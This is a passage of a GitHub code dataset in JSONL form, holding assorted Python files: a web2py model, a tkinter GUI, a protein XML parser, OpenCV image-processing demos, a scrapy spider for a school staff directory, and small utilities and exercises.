(db.auth_group.id==db.auth_membership.group_id) & (db.auth_membership.user_id==db.auth_user.id))\n db.Task.assigned.requires=IS_EMPTY_OR(IS_IN_DB(db(query), db.auth_user, '%(first_name)s'))\ndb.Task.story_id.writable = db.Task.story_id.readable = False\n\ndb.define_table('Invitations',\n Field('to_user', 'reference auth_user'),\n Field('from_user', 'reference auth_user', default=auth.user_id),\n Field('from_group', 'reference auth_group'))\n\n#db.define_table('TSR',Field('Team','integer', writable=False),Field('Time_Period'),Field('Weekly_Summarization', 'text', requires = IS_NOT_EMPTY()))\n\nPost= db.define_table(\"post\",\n Field(\"message\", \"text\", requires=IS_NOT_EMPTY(), notnull=True),\n auth.signature)\nPost.is_active.readable = False\nPost.is_active.writable = False\n","repo_name":"coltonUCSC/cs183","sub_path":"models/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39804555326","text":"import tkinter as tk\nfrom homepage import *\nfrom searchpage import *\nfrom calcpage import *\n\nclass MainView(tk.Frame):\n def __init__(self, *args, **kwargs):\n tk.Frame.__init__(self, *args, **kwargs)\n\n home = HomePage(self)\n search = SearchPage(self)\n calc = CalcPage(self)\n\n buttonFrame = tk.Frame(self, height=600, width=50, highlightbackground=\"black\", highlightthickness=1, bg=\"sky blue\")\n container = tk.Frame(self, height=600, width=750)\n buttonFrame.pack(side=\"left\", fill=\"y\", expand=False)\n container.pack(side=\"right\", fill=\"both\", expand=True)\n\n home.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n search.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n calc.place(in_=container, x=0, y=0, relwidth=1, relheight=1)\n\n b1 = tk.Button(buttonFrame, width=8, height=5, text=\"Home\", bg=\"medium aquamarine\", command=home.show)\n b2 = tk.Button(buttonFrame, width=8, height=5, text=\"Search\", bg=\"deep sky blue\", command=search.show)\n b3 = tk.Button(buttonFrame, width=8, height=5, text=\"Calculator\", bg=\"royal blue\", command=calc.show)\n \n b1.pack(side=\"top\")\n b2.pack(side=\"top\")\n b3.pack(side=\"top\")\n \n home.update()\n\n home.show() \n\nif __name__ == \"__main__\":\n master = tk.Tk()\n\n main = MainView(master)\n main.pack(side=\"top\", fill=\"both\", expand=\"True\")\n master.wm_geometry(\"600x450\")\n master.resizable(0, 0) \n master.mainloop()\n","repo_name":"Yacine-Saoudi/hackathonRepo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40420285562","text":"import xml.etree.ElementTree as ET\nimport xml\nimport pandas as pd\nimport pickle as pic\nfrom mmseqs_hmmtop import overlapDict\nimport json\n\n\nquery_data = {}\ntarget_data = {}\n\ndef get_tms_info(protein, genome):\n # if we are looking for tms info of a genome protein\n if genome == True:\n return query_data[protein]\n else:\n return target_data[protein]\n\n\ndef parse(hmmtop_file, xml_dir, results_file, minRes):\n with open(hmmtop_file, \"rb\") as file:\n # Deserialize the data using pickle.load()\n data = pic.load(file)\n \n # Extracts all query data and target data from hmmtop file\n query_data = data['queries']\n \n with open('genome_tms.txt', 'w') as f:\n json.dump(data, f, indent=4)\n\n for key in data['tcdb']:\n key_elems = key.split('|')\n new_key = key_elems[3] + '-' + key_elems[2].split('.')[0]\n \n target_data[new_key] = data['tcdb'][key]\n\n\n \n xml_format = xml_dir\n tsv_file = results_file\n df = pd.read_table(tsv_file)\n file_to_find = df['#Query_id']\n\n dictionary = {}\n\n\n sequences = {}\n mmseqsDict = {}\n hmmTopDict = {}\n # for each id in the dataframe results.tsv\n for row in df.itertuples(index=False):\n key = row._0\n hmm_key = row._0\n xmlfile = xml_format + key + '.xml'\n tree = ET.parse(xmlfile)\n root = tree.getroot()\n\n\n # ['gnl', 'TC-DB', 'P60778', '2.A.1.7.14 Protein tsgA OS=Escherichia coli (strain K12) GN=tsgA PE=1 SV=1']\n # goes through each branch of the xml file that contains 'hit'\n for item in root.findall('./BlastOutput_iterations/Iteration/Iteration_hits/Hit'):\n hit_info = item.find('Hit_def').text.split('|')\n # looks for the specific target accession that correlates to the results.tsv data trunkating the .1 at end of hit_xid\n if hit_info[2].split('.')[0] == row.Hit_xid and hit_info[3].split(' ')[0] == row.Hit_tcid: # fails here\n j = item.findall('Hit_hsps/Hsp')\n # if it exists, then look to see if there is alignment sequences in xml\n for h_item in j:\n query_seq = h_item.find('Hsp_qseq').text\n subject_seq = h_item.find('Hsp_hseq').text\n target_id = row.Hit_tcid + '-' + row.Hit_xid\n\n # only include in mmseqs if the target accession and query exists in results.tsv\n if key in query_data and target_id in target_data: # issue here not in target_data\n if key not in mmseqsDict:\n mmseqsDict[key] = {'qaln': query_seq, 'taln': subject_seq, 'target': target_id,\n 'qstart': row.Q_start, 'qend': row.Q_end, 'tstart': row.S_start, 'tend': row.S_end}\n # puts the overlaps in the format needed by overlapDict\n qtms = {}\n if key in query_data:\n qtms['tms'] = list(query_data[key].values())\n if key not in hmmTopDict:\n hmmTopDict[key] = qtms\n\n\n ttms = {}\n if target_id in target_data:\n ttms['tms'] = list(target_data[target_id].values())\n if target_id not in hmmTopDict:\n hmmTopDict[target_id] = ttms\n #print(target_data)\n # there are some keys in df that are not in query or target data what to do about those?\n overlap_dict = overlapDict(mmseqsDict, hmmTopDict, minRes)\n return overlap_dict\n\ndef main():\n hmmtop_file, xml_dir, results_file, minRes = \"gblast_test/hmmtop.db\", \"gblast_test/xml/\", 'gblast_test/results.tsv', 8\n parse(hmmtop_file, xml_dir, results_file, minRes)\n\n'''\n#For Testing\ntempMmseqs = {}\ntempData = {}\ntempData['qaln'] = 'MGFDIGGDIGKPLKDAFDKFGADIKMTFLTVLNWMK--WISIG------ILIVISVI-------LICKIIKVLFQCGKCLLSCFGFCKK'\ntempData['taln'] = 'MGFSINFD---PIINKFREFQTNINHNINEQLDKLKMVWINLGSHIKYWFIIIISILTILFILFLLIKITKLILNCKKIFSCCCNVCCK'\ntempData['target'] = '1.A.100.1.1-B2X7D9'\ntempData['qstart'] = 1\ntempData['qend'] = 74\ntempData['tstart'] = 22\ntempData['tend'] = 107\ntempMmseqs['1.A.95.2.5-YP_009361958'] = tempData\n\ntempHmmtop = {}\ntempQhmmData = {}\ntempQhmmData['tms'] = [[26, 49], [54,72]]\ntempThmmData = {}\ntempThmmData['tms'] = [[68, 92]]\ntempHmmtop['1.A.95.2.5-YP_009361958'] = tempQhmmData\ntempHmmtop['1.A.100.1.1-B2X7D9'] = tempThmmData\noverlap_dict = overlapDict(tempMmseqs, tempHmmtop, minRes)\n'''\n","repo_name":"gauthamp123/microbiome_project","sub_path":"parseXML.py","file_name":"parseXML.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29489707142","text":"from turtle import Turtle\r\n\r\n\r\nclass ScoreBoard(Turtle):\r\n def __init__(self):\r\n super().__init__()\r\n self.scores = 0\r\n with open(\"data\") as high_score_data:\r\n self.high_score = int(high_score_data.read())\r\n self.color(\"white\")\r\n self.hideturtle()\r\n self.penup()\r\n self.goto(0, 180)\r\n\r\n def score_board(self):\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def score_update(self):\r\n self.clear()\r\n self.scores += 1\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def h(self):\r\n self.clear()\r\n self.write(f\"SCORE: {self.scores} High Score: {self.high_score}\", align=\"center\",\r\n font=(\"Courier\", 10, \"normal\"))\r\n\r\n def reset(self):\r\n if self.scores > self.high_score:\r\n self.high_score = self.scores\r\n with open(\"data\", mode=\"w\") as high_score_data:\r\n high_score_data.write(f\"{self.high_score}\")\r\n self.scores = 0\r\n self.h()\r\n\r\n #def game_over(self):\r\n #self.goto(0, 0)\r\n #self.write(\"GAME OVER\", align=\"center\", font=(\"Courier\", 20, \"normal\"))\r\n\r\n\r\n\r\n","repo_name":"Nabayan1/nobster","sub_path":"score_board.py","file_name":"score_board.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19176556552","text":"import unittest\nimport math\nfrom subgradpy import *\n\nclass testNorm2(unittest.TestCase):\n def setUp(self):\n pass\n \n def test_get_value(self):\n x = var('x');\n y = var('y');\n z = var('z');\n var_map={'x':12.2,'y':-3.4,'z':0.0}\n ex = norm2(x,y,z)\n self.assertAlmostEqual(ex.get_value(var_map),\n math.sqrt(sum([elem*elem for elem in var_map.values()])))\n \n def test_subgrad(self):\n x = var('x');\n y = var('y');\n z = var('z');\n var_map={'x':12.2,'y':-3.4,'z':0}\n ex = norm2(x,y,z)\n g = ex.subgrad(var_map)\n self.assertAlmostEqual(g['x'],12.2/(math.sqrt(12.2**2.0+3.4**2.0)))\n self.assertAlmostEqual(g['y'],-3.4/(math.sqrt(12.2**2.0+3.4**2.0)))\n self.assertAlmostEqual(g['z'],0)\n\n \n\nif __name__=='__main__':\n unittest.main()\n","repo_name":"cvxgrp/subgradpy","sub_path":"unit_tests/norm2_test.py","file_name":"norm2_test.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"21349439019","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 27 14:03:15 2021\n\n@author: james\n\"\"\"\n\nimport retrieve_stock_data as rsd\nimport numpy as np\n\ndef get_biggest_changes(dfs, days = -1):\n \"\"\"\n Get the stocks that have changed the most in the given timeframe\n based on the average over the given period. \n Note wer'e assuming dataframe is in period of days\n \"\"\"\n percent_changes = get_percentage_changes(dfs, days)\n most_increased, most_decreased = determine_biggest_changes(percent_changes)\n return most_increased, most_decreased\n \n\ndef get_percentage_changes(dfs, days):\n \"\"\"\n Calculate the amount all stocks have changed over the given period\n \"\"\"\n changes = {}\n for company in dfs:\n df = dfs[company]\n close_prices = df['Adj Close']\n if(len(close_prices)) ==0:\n continue\n \n if days != -1:\n length = len(close_prices)\n close_prices = close_prices[(length - days)::]\n\n try:\n mean = close_prices.mean()\n cur = close_prices[len(close_prices)-1]\n per = (cur - mean)/mean * 100\n changes[company] = per\n except Exception as e:\n print(f\"Error getting {company}:{e}\")\n \n return changes\n \ndef determine_biggest_changes(changes):\n \"\"\"\n Retrieve a list of the companies that have changed the most based on\n the calculated percentage change. Returns sepearte lists of those that \n have increased the most and those that have decreased\n \"\"\"\n list_companies = [company for company in changes]\n list_changes = [changes[change] for change in changes]\n arr_changes = np.array(list_changes)\n indexes = np.argsort(arr_changes)\n \n decreases = [list_companies[i] for i in indexes[0:20]]\n increases = [list_companies[i] for i in indexes[::-1][0:20]]\n return increases, decreases\n \n\ndfs, stocks = rsd.get_all_data_frames()\n\nmost_increased, most_decreased = get_biggest_changes(dfs, 6*30)\n\n","repo_name":"JamesLaw86/finance_tools","sub_path":"analyse_stock_data.py","file_name":"analyse_stock_data.py","file_ext":"py","file_size_in_byte":1999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"405187874","text":"import os\nimport errno\nimport json\n\n\ndef validate_or_make_directory(directory_string):\n \"\"\"\n Check if a directory exists. If it doesn't, then create it.\n\n :param directory_string: The relative directory string (ex: database/secrets.json)\n :type directory_string: str\n \"\"\"\n if not os.path.exists(os.path.dirname(directory_string)):\n try:\n os.makedirs(os.path.dirname(directory_string))\n print(\"Successfully created `{}` file directory\".format(directory_string))\n except OSError as exception: # Guard against race condition\n if exception.errno != errno.EEXIST:\n raise\n\n\ndef get_json_from_file(directory_string, default_json_content=None):\n \"\"\"\n Get the contents of a JSON file. If it doesn't exist,\n create and populate it with specified or default JSON content.\n\n :param directory_string: The relative directory string (ex: database/secrets.json)\n :type directory_string: str\n :param default_json_content: The content to populate a non-existing JSON file with\n :type default_json_content: dict, list\n \"\"\"\n validate_or_make_directory(directory_string)\n try:\n with open(directory_string) as file:\n file_content = json.load(file)\n file.close()\n return file_content\n except (IOError, json.decoder.JSONDecodeError):\n with open(directory_string, \"w\") as file:\n if default_json_content is None:\n default_json_content = {}\n json.dump(default_json_content, file, indent=4)\n file.close()\n return default_json_content\n\n\ndef write_json_to_file(directory_string, json_content):\n \"\"\"\n Get the contents of a JSON file. If it doesn't exist,\n create and populate it with specified or default JSON content.\n\n :param directory_string: The relative directory string (ex: database/secrets.json)\n :type directory_string: str\n :param json_content: The content to populate a non-existing JSON file with\n :type json_content: dict\n \"\"\"\n with open(directory_string, \"w\") as file:\n json.dump(json_content, file, indent=4)\n file.close()\n","repo_name":"JPStrydom/Crypto-Trading-Bot","sub_path":"src/directory_utilities.py","file_name":"directory_utilities.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","stars":300,"dataset":"github-code","pt":"48"} +{"seq_id":"28127294911","text":"# -*- coding: utf-8 -*-\r\n\r\nimport socket\r\nfrom escpos import printer, escpos\r\nimport threading\r\nimport time\r\nimport logging\r\nfrom DriverInterface import DriverInterface\r\n\r\n\r\n# TCP_PORT = 9100\r\n\r\n\r\nclass ReceiptDirectJetDriver(printer.Network, DriverInterface):\r\n connected = False\r\n\r\n def __init__(self, host, port=9100, timeout=10, codepage=\"cp858\", mac=\"\", vendor=\"\", cols=42, *args, **kwargs):\r\n \"\"\" escrito aqui solo para tener bien en claro las variables iniciales\"\"\"\r\n \"\"\"\r\n :param host : Printer's hostname or IP address\r\n :param port : Port to write to\r\n :param timeout : timeout in seconds for the socket-library\r\n :param codepage : codepage default to cp858\r\n \"\"\"\r\n escpos.Escpos.__init__(self, *args, **kwargs)\r\n self.host = host\r\n self.port = int(port)\r\n self.timeout = timeout\r\n self.codepage = codepage\r\n self.cols = int(cols)\r\n\r\n def start(self):\r\n \"\"\" iniciar \"\"\"\r\n try:\r\n self.open()\r\n self.connected = True\r\n except Exception as e:\r\n logging.error(\"Error de la impresora: \"+str(e))\r\n return True\r\n\r\n\r\n def end(self):\r\n try:\r\n self.close()\r\n self.connected = False\r\n except Exception as e:\r\n logging.error(\"Error de la impresora: \"+str(e))\r\n\r\n def reconnect(self):\r\n try:\r\n self.open()\r\n self.connected = True\r\n except Exception as e:\r\n self.connected = False\r\n","repo_name":"paxapos/fiscalberry","sub_path":"Drivers/ReceiptDirectJetDriver.py","file_name":"ReceiptDirectJetDriver.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"48"} +{"seq_id":"71882724627","text":"\"\"\"\n입력받은 리스트에서 요소들의 최소 공배수 구하기\n\"\"\"\n\n\ndef least(a, b):\n i = 1\n while True:\n if a * i % b == 0:\n return a * i\n else:\n i += 1\n\n\ndef solution(arr):\n temp = arr[0]\n for _, value in enumerate(arr, 1):\n temp = least(temp, value)\n return temp\n\n\narr = [2, 6, 8, 14]\nprint(solution(arr))\n\n\n","repo_name":"Donkey-1028/algorithms","sub_path":"alghorithms-of-everyone/least-common-multiple.py","file_name":"least-common-multiple.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9902160165","text":"from random import randint\nfrom unicodedata import decimal\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport os\nfrom scisdk.scisdk import SciSDK\nfrom scisdk.scisdk_defines import *\n\nfig = plt.figure(\"Digitizer analog data - channel 0\")\nax1 = fig.add_subplot(1,1,1)\n\n# initialize scisdk library\nsdk = SciSDK()\n\n#DT1260\nres = sdk.AddNewDevice(\"usb:10500\",\"dt1260\", \"./DT1260RegisterFile.json\",\"board0\")\n#DT5560\n#res = sdk.AddNewDevice(\"192.168.50.10:8888\",\"DT5560\", \"./DT5560RegisterFile.json\",\"board0\")\n#DT5550\n#res = sdk.AddNewDevice(\"usb:11000\",\"DT5550\", \"./DT5550RegisterFile.json\",\"board0\")\n#V2740\n#res = sdk.AddNewDevice(\"192.168.50.10\",\"V2740\", \"./V2740RegisterFile.json\",\"board0\")\n\nif res != 0:\n print (\"Script exit due to connetion error\")\n exit()\n\nenabled_channels = 1\n# set oscilloscope parameters\nres = sdk.SetParameterString(\"board0:/MMCComponents/Digitizer_0.data_processing\",\"decode\")\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.enabledch\", enabled_channels)\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.acq_len\", 8000)\nres = sdk.SetParameterString(\"board0:/MMCComponents/Digitizer_0.acq_mode\", \"blocking\")\nres = sdk.SetParameterInteger(\"board0:/MMCComponents/Digitizer_0.timeout\", 2000)\nres = sdk.ExecuteCommand(\"board0:/MMCComponents/Digitizer_0.start\", \"\")\n# allocate buffer for oscilloscope\nres, buf = sdk.AllocateBuffer(\"board0:/MMCComponents/Digitizer_0\")\n\ndef updateGraph(i, buffer): # function that provides to plot new data on graph\n res, buffer = sdk.ReadData(\"board0:/MMCComponents/Digitizer_0\", buffer)# read data from board\n if res == 0:\n xar = []\n yar = []\n for index in range(buffer.info.valid_samples):\n xar.append(index)\n yar.append(buffer.analog[index])\n ax1.clear()\n ax1.plot(xar,yar)\n\n# update graph every 50ms\nani = animation.FuncAnimation(fig, updateGraph, fargs=[buf],interval=200)\n# updateGraph(None, buf, decimator)\nplt.show()","repo_name":"NuclearInstruments/SCISDK","sub_path":"examples/components/Python/Digitizer/digitizer.py","file_name":"digitizer.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"454065026","text":"#access to properties of image and videos\n\nimport cv2 as cv\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg =cv.imread('test.png')\npx = img[100,100] # the specific pixel of img [100, 100]\nprint(px) #print out properties\n\nblue = img[100,100,0] # show the properties of blue =0 green=1 red=2 as BRG\nprint(blue)\n\nimg[100, 100] = [255, 255, 255] # change color of pixel [100,100]\nprint(px)\n\ncolory = cv.imread('test.jpg', cv.IMREAD_COLOR)\nalpha_img = cv.imread('test.jpg', cv.IMREAD_UNCHANGED)\ngray_img = cv.imread('test.jpg', cv.IMREAD_GRAYSCALE)\n\n#shape of img\nprint('RGB shape : ', colory.shape)\nprint('Alpha shape : ', alpha_img.shape)\nprint('gray shape : ', gray_img.shape)\n#img type\nprint('image datatype : ', colory.dtype)\n\n#img size\nprint('image Size : ', colory.size)\n\n# cropping selected ROI from img\nroi = cv.selectROI(img)\nprint(roi)\nroi_cropped = img[int(roi[1]):int(roi[1]+roi[3]), int(roi[0]):int(roi[0]+roi[2])] #get cropped position\ncv.imshow(\"ROI Image\", roi_cropped) #show cropped img\ncv.imwrite(\"cropped.jpg\", roi_cropped) #save cropped to file\n\n\n#split image to three channel\ng,b,r = cv.split(img)\n\ncv.imshow(\"green\", g)\ncv.imshow(\"blue\" , b)\ncv.imshow(\"red\" , r)\n\nimag = cv.merge((g,b,r)) #merge two channel to one\ncv.imshow(\"merge\",imag)\n\n\n# change color of image\nlab = cv.cvtColor(img, cv.COLOR_RGB2LAB)\ncv.imshow(\"lab view\", lab)\n\n\n# blending two image\nsrc1 = cv.imread('test.png', cv.IMREAD_COLOR)\nsrc2 = cv.imread('index.jpg', cv.IMREAD_COLOR)\nimg1 = cv.resize(src1, (800,600)) #resize image\nimg2 = cv.resize(src2, (800,600))\nblended_img = cv.addWeighted(img1,0.5,img2,1,0.0) #blend two image together\ncv.imshow(\"blended image\", blended_img)\n\n# Apply filters\nk_sharpen = np.array([[-1,-1,-1],\n [-1,9 ,-1],\n [-1,-1,-1]])\nk_edge = np.array([[1,1,1],\n [1,-9 ,1],\n [1,1,1]])\n# apply filters\nsharpen = cv.filter2D(img,-1,k_edge)\nsharpen = cv.filter2D(img,-1,k_sharpen)\ncv.imshow(\"filtered\", sharpen)\n\n\n# some other filters\ngray = cv.imread(\"index.jpg\", cv.IMREAD_GRAYSCALE)\nret, thresh = cv.threshold(gray,127, 255, cv.THRESH_BINARY)\ncanny_img = cv.Canny(gray,50,100)\ncv.imshow(\"original\", gray)\ncv.imshow(\"threshold\", thresh)\ncv.imshow(\"canny\", canny_img)\n\n\n# contour and shape detection\nshape = cv.imread('shapes.png')\ngray = cv.cvtColor(shape, cv.COLOR_BGR2GRAY)\n\n#Setting threshold of the gray image\n_, threshold = cv.threshold(gray,127,255, cv.THRESH_BINARY)\n\n#countour using findcontours function\ncontours,_= cv.findContours(threshold, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n\ni=0\nfor contour in contours:\n if i==0:\n i=1\n continue\n appox = cv.approxPolyDP(contour,0.01*cv.arcLength(contour,True), True)\n cv.drawContours(shape, [contour], 0, (255,0,255), 5)\n\n #findind the center of diffrent shapes\n M = cv.moments(contour)\n if M['m00'] != 0.0:\n x= int(M['m10']/M['m00'])\n y= int(M['m01']/M['m00'])\n\n # I want to put names of shaoes inside of shape\n if len(appox) ==3:\n cv.putText(shape,'Triangle', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0,255,255), 2)\n elif len(appox) ==4:\n cv.putText(shape, 'Quadri', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n elif len(appox) ==5:\n cv.putText(shape, 'Pentagon', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n elif len(appox) ==6:\n cv.putText(shape, 'Hegzaton', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n elif len(appox) ==7:\n cv.putText(shape, '7-Gon', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n else:\n cv.putText(shape, 'Circle', (x, y), cv.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 255), 2)\n\ncv.imshow('shapes', shape)\n\n# Color detection\nhsv = cv.cvtColor(img,cv.COLOR_BGR2HSV)\n#range of blue color to show\nlower_blue = np.array([0,50,50])\nupper_blue = np.array([140,255,255])\n#throshold the hdv image to get only blue colors\nmake_blue = cv.inRange(hsv, lower_blue,upper_blue)\nres = cv.bitwise_and(img,img,mask=make_blue) #put mask on image\ncv.imshow('res', res)\n\n\n# place an object\nimg1 = shape.copy()\nmask=np.zeros((100,200,3))\nprint(mask.shape)\npos = (200,200)\nvar = img1[200:(200+mask.shape[0]), 200:(200+mask.shape[1])]=mask\ncv.imshow(\"coloring\",img1)\n\n\ncv.waitKey(0)\ncv.destroyAllWindows()","repo_name":"ramin77786408/Opencv-Learning","sub_path":"next_episode_opencv.py","file_name":"next_episode_opencv.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5396888923","text":"def LaSoNguyenTo(x):\n if x<2:\n return False\n for i in range(2,x+1,1):\n if x%i==0:\n break\n if x==i:\n return True\ndef SoHopLe(x):\n return x<=1\ndef NhapVaDem():\n j=1\n kq=0\n while j>0:\n x=int(input())\n if LaSoNguyenTo(x):kq+=1\n if SoHopLe(x):break\n return kq\ndef InKQ(kq):\n print('Co',kq,'so nguyen to')\nprint('Nhap day so:')\nkq=NhapVaDem()\nInKQ(kq)","repo_name":"phamhung116/CoSoLapTrinh","sub_path":"Chuong4/BaiTap/4-5.py","file_name":"4-5.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21445442364","text":"import base64\nimport glob\nimport requests\nfrom PyPDF2 import PdfFileWriter, PdfFileReader\n\norig_path = \"../dense-vector-elastic/pdfs/*.pdf\"\n\n# for fname in glob.glob(orig_path):\n# filename = fname.split('/')[2]\n# inputpdf = PdfFileReader(open(fname, \"rb\"))\n#\n# for i in range(inputpdf.numPages):\n# output = PdfFileWriter()\n# output.addPage(inputpdf.getPage(i))\n# with open(\"../pages-pdfs/{}-{}.pdf\".format(filename, i), \"wb\") as outputStream:\n# output.write(outputStream)\n\nid = 0\n\npages_path = \"../dense-vector-elastic/pages-pdfs/*.pdf\"\n\nfor fname in glob.glob(pages_path):\n print(fname)\n with open(fname, 'rb') as f:\n data = base64.b64encode(f.read()).decode('ascii')\n r = requests.put('http://192.168.8.101:9200/pdfs/_doc/{}?pipeline=pdf-indexing'.format(id),\n json = {\n \"data\": data\n })\n id += 1\n\n","repo_name":"MysterionRise/boost-search","sub_path":"dense-vector-elastic/encode_pdfs.py","file_name":"encode_pdfs.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"2789504200","text":"import scrapy\nimport re\n\nclass SchoolSpider(scrapy.Spider):\n name = 'school'\n allowed_domains = ['isd110.org']\n start_urls = ['https://isd110.org/our-schools/laketown-elementary/staff-directory']\n custom_settings = {\n 'FEED_FORMAT': 'csv',\n 'FEED_URI': 'isd_data.csv'\n }\n \n def init_request(self,response):\n \n school_name = response.xpath('//div[@class=\"paragraph staff default\"]//div[@class=\"field-content\"]/span/text()').extract_first().strip()\n address1 = response.xpath('//p[@class=\"address\"]/text()[1]').extract_first().strip()\n address2 = response.xpath('//p[@class=\"address\"]/text()[2]').extract_first().strip()\n address = address1+address2\n state = re.findall(r'[A-Z][A-Z]',address2)[0]\n zip_code =re.findall(r\"(?!\\A)\\b\\d{5}(?:-\\d{4})?\\b\",address2)[0]\n names = response.xpath('//div[@class=\"paragraph staff default\"]//h2[@class=\"title\"]/text()').extract()\n job_titles = response.xpath('//div[@class=\"field job-title\"]/text()').extract()\n phones = response.xpath('//div[@class=\"field phone\"]/a/text()').extract()\n emails = response.xpath('//div[@class=\"field email\"]/a/text()').extract()\n \n for name,job_title,phone,email in zip(names,job_titles,phones,emails):\n first_name = name.split(',')[0]\n last_name = name.split(',')[1]\n job_title=job_title.strip()\n yield {\n \"School\":school_name,\n \"Address\":address,\n \"State\":state,\n \"Zip\":zip_code,\n \"First Name\":first_name,\n \"Last Name\":last_name,\n \"Title\":job_title,\n \"Phone\":phone,\n \"Email\":email\n }\n\n def parse(self, response):\n base_url = 'https://isd110.org/our-schools/laketown-elementary/staff-directory?s=&page='\n pagination = response.xpath('//li[@class=\"item last\"]/a/@href').extract_first()\n len_of_pages = pagination.replace('?s=&page=','')\n \n \n \n for page in range(1,int(len_of_pages)+1):\n \n next_page_url = base_url+str(page)\n yield scrapy.Request(next_page_url,callback=self.init_request)\n","repo_name":"Bhupendrasolanki9/Catlyst_assessment","sub_path":"school.py","file_name":"school.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5104943279","text":"from __future__ import division\nfrom __future__ import print_function\nimport argparse\n\nparser = argparse.ArgumentParser(description='Test response of model')\nparser.add_argument('results', metavar='', nargs='+', type=argparse.FileType('rb'), help='Filename of results file')\nparser.add_argument('-o', '--output', default=None, type=argparse.FileType('wb'), help='Filename of output file')\nparser.add_argument('--captions', metavar='', nargs='*', type=str, help='Captions')\n\nargs = parser.parse_args()\nresults_files = args.results\ncaptions = args.captions\nif captions:\n assert len(captions) == len(results_files), \"Must supply caption for all\"\n\nif args.output is not None:\n import matplotlib\n matplotlib.use('Agg')\nimport numpy as np\nimport matplotlib.pylab as plt\nimport gv\n\nuse_other_style = False \n\nfig = plt.figure(figsize=(7, 7))\n\nfor i, results_file in enumerate(results_files):\n data = np.load(results_file)\n \n try:\n num_images = data['num_images']\n except:\n num_images = 741\n\n if num_images == 0:\n num_images = 741\n\n detections = data['detections']\n tp_fn = int(data['tp_fn'])\n fppi, miss_rate = gv.rescalc.calc_fppi_miss_rate(detections, tp_fn, num_images)\n\n summary = gv.rescalc.calc_fppi_summary(fppi, miss_rate) \n\n print(results_file.name)\n print('Avg miss rate: {0:.02f}% ({1})'.format(100*summary, summary))\n #print(detections[-10:])\n print()\n\n if captions:\n caption = captions[i]\n else:\n caption = results_file.name\n\n caption = \"{0:.02f}% {1}\".format(100*summary, caption)\n\n ax = fig.add_subplot(1, 1, 1)\n\n ax.set_xscale('log')\n ax.set_yscale('log')\n\n print('fppi', fppi)\n print('miss-rate', miss_rate)\n ax.plot(fppi, miss_rate, '-',label=caption)\n ax.set_xlabel('FPPI')\n ax.set_ylabel('Miss rate')\n ticks = [0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0]\n ax.set_yticks(ticks)\n ax.set_yticklabels(map(str, ticks))\n #plt.xlim((0, 1))\n #plt.ylim((0, 1))\n plt.xlim((3*10**-3, 10**0))\n plt.ylim((0.025, 1.0))\n\nplt.legend(loc=3)#fontsize='small')#, framealpha=0.2)\n\nplt.grid()\n#plt.xticks(np.arange(0, 1+0.001, 0.05))\n#plt.yticks(np.arange(0, 1+0.001, 0.05))\nif args.output is not None:\n plt.savefig(args.output)\nelse:\n plt.show()\n\n","repo_name":"gustavla/vision-research","sub_path":"detector/plot_fppi.py","file_name":"plot_fppi.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"37259968571","text":"# 9. 세 자리 양의 정수 A, B, C가 주어지면,\n# A * B * C 의 계산 결과에서 0부터 9까지의 숫자가 각각 몇 번씩 쓰였는지 구하는 프로그램\n\ntemp = {\n 0:0,\n 